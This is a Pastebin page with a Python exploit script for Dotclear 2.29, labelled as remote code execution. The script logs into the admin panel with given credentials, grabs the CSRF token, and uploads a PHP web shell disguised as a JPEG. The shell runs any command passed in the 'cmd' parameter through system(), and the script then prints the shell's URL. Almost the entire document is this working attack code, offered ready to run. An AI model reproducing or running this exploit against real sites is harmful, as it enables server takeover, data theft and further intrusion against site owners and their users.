Advertisement
FlyFar

Dotclear 2.29 - Remote Code Execution (RCE)

Jun 8th, 2024
432
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.00 KB | Cybersecurity | 0 0
  1. # Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)
  2. # Discovered by: Ahmet Ümit BAYRAM
  3. # Discovered Date: 26.04.2024
  4. # Vendor Homepage: https://git.dotclear.org/explore/repos
  5. # Software Link: https://github.com/dotclear/dotclear/archive/refs/heads/master.zip
  6. # Tested Version: v2.29 (latest)
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import time
  11. import random
  12. import string
  13. from bs4 import BeautifulSoup
  14.  
  15. def generate_filename(extension=".inc"):
  16. return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
  17. extension
  18.  
  19. def get_csrf_token(response_text):
  20. soup = BeautifulSoup(response_text, 'html.parser')
  21. token = soup.find('input', {'name': 'xd_check'})
  22. return token['value'] if token else None
  23.  
  24. def login(base_url, username, password):
  25. print("Exploiting...")
  26. time.sleep(1)
  27. print("Logging in...")
  28. time.sleep(1)
  29. session = requests.Session()
  30. login_data = {
  31. "user_id": username,
  32. "user_pwd": password
  33. }
  34. login_url = f"{base_url}/admin/index.php?process=Auth"
  35. login_response = session.post(login_url, data=login_data)
  36. if "Logout" in login_response.text:
  37. print("Login Successful!")
  38. return session
  39. else:
  40. print("Login Failed!")
  41. return None
  42.  
  43. def upload_file(session, base_url, filename):
  44. print("Shell Preparing...")
  45. time.sleep(1)
  46. boundary = "---------------------------376201441124932790524235275389"
  47. headers = {
  48. "Content-Type": f"multipart/form-data; boundary={boundary}",
  49. "X-Requested-With": "XMLHttpRequest"
  50. }
  51. csrf_token = get_csrf_token(session.get(f"{base_url}
  52. /admin/index.php?process=Media").text)
  53. payload = (
  54. f"--{boundary}\r\n"
  55. f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"
  56. f"2097152\r\n"
  57. f"--{boundary}\r\n"
  58. f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n"
  59. f"{csrf_token}\r\n"
  60. f"--{boundary}\r\n"
  61. f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename}
  62. \"\r\n"
  63. f"Content-Type: image/jpeg\r\n\r\n"
  64. "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
  65. basename($_SERVER['PHP_SELF']); ?>\">\n"
  66. "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
  67. type=\"SUBMIT\" value=\"Execute\">\n"
  68. "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
  69. \n?>\n</pre>\n</body>\n</html>\r\n"
  70. f"--{boundary}--\r\n"
  71. )
  72. upload_response = session.post(f"{base_url}
  73. /admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0",
  74. headers=headers, data=payload.encode('utf-8'))
  75.  
  76. if upload_response.status_code == 200:
  77. print(f"Your Shell is Ready: {base_url}/public/{filename}")
  78. else:
  79. print("Exploit Failed!")
  80.  
  81. def main(base_url, username, password):
  82. filename = generate_filename()
  83. session = login(base_url, username, password)
  84. if session:
  85. upload_file(session, base_url, filename)
  86.  
  87. if __name__ == "__main__":
  88. import sys
  89. if len(sys.argv) != 4:
  90. print("Usage: python script.py <siteurl> <username> <password>")
  91. else:
  92. base_url = sys.argv[1]
  93. username = sys.argv[2]
  94. password = sys.argv[3]
  95. main(base_url, username, password)
  96.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement